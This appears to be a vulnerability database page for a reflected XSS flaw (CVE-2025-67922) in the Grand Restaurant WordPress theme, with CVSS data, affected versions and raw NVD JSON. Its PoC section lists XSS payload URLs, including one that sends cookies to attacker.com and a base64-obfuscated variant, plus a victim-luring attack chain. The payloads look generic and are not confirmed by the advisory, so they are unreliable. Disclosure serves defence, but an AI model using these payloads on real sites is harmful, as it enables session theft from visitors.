Security Vulnerability Report
CVE-2025-67922 CVSS 7.1 HIGH

CVE-2025-67922

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:49

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant (grandrestaurant) allows Reflected XSS. This issue affects Grand Restaurant: from n/a through < 7.0.9.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:themegoods:grand_restaurant:*:*:*:*:*:wordpress:*:* - VULNERABLE
Grand Restaurant theme < 7.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
text
<!-- CVE-2025-67922 PoC - Reflected XSS in Grand Restaurant Theme -->
<!-- Target: WordPress sites using Grand Restaurant theme < 7.0.9 -->
<!-- This PoC demonstrates a reflected XSS attack -->

<!-- Method 1: Using script tag -->
https://target-site.com/?s=<script>alert(document.cookie)</script>

<!-- Method 2: Using img onerror handler -->
https://target-site.com/?s=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>

<!-- Method 3: Using SVG onload event -->
https://target-site.com/?s=<svg onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>

<!-- Method 4: Using anchor with javascript protocol -->
https://target-site.com/?s=<a href="javascript:alert(document.domain)">Click me</a>

<!-- Method 5: Using body onload event -->
https://target-site.com/?s=<body onload=alert('XSS')>

<!-- Recommended attack chain: -->
1. Attacker creates a shortened/masked URL using URL shortener or email
2. Lures victim to click the malicious link
3. Victim's browser executes the injected JavaScript
4. Attacker steals session cookies or performs actions on behalf of victim

References

https://patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67922",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T10:15:51.220",
    "lastModified": "2026-04-27T18:16:49.330",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS.This issue affects Grand Restaurant: from n/a through < 7.0.9."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:themegoods:grand_restaurant:*:*:*:*:*:wordpress:*:*",
                "versionEndExcluding": "7.0.9",
                "matchCriteriaId": "B4D1C073-6B70-440B-A651-4CA5D3ED8AC6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]",
        "tags": [
          "Third Party Advisory"
        ]
      }
    ]
  }
}